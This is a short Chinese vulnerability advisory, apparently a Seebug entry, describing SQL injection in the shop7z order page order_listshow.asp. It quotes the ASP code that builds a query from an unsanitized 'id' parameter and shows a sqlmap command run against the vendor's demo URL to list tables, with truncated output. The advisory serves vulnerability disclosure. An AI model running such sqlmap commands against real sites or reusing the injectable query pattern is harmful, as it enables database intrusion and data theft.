shop7z 订单处注入

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: order_listshow.asp 文件注入 ### 详细说明: order_listshow.asp文件 70-75 ``` dim sql4,rs4,id,num,pkid dim sql5,rs5,model,productname,price2,price,money,a,q,allmoney,allnum allmoney=0 allnum=0 sql4="select * from x_bill_product where billid="&request.QueryString("id")&"" set rs4=conn.execute(sql4) ``` ### 漏洞证明: [<img src="https://images.seebug.org/upload/201409/1518341764593b7c5dc21c4cd5ee893268ea2296.jpg" alt="order_show.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/1518341764593b7c5dc21c4cd5ee893268ea2296.jpg) F:\迅雷下载\sqlmap>python sqlmap.py -u "http://www.shop7z.com/demo/order_listsho w.asp?id=1" --tables _ ___ ___| |_ ___ ___ {1.0-dev-nongit-20140911} |_ -| . | | | .'| . | |___|_ |_|_|_|_|__,| _| |_| |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息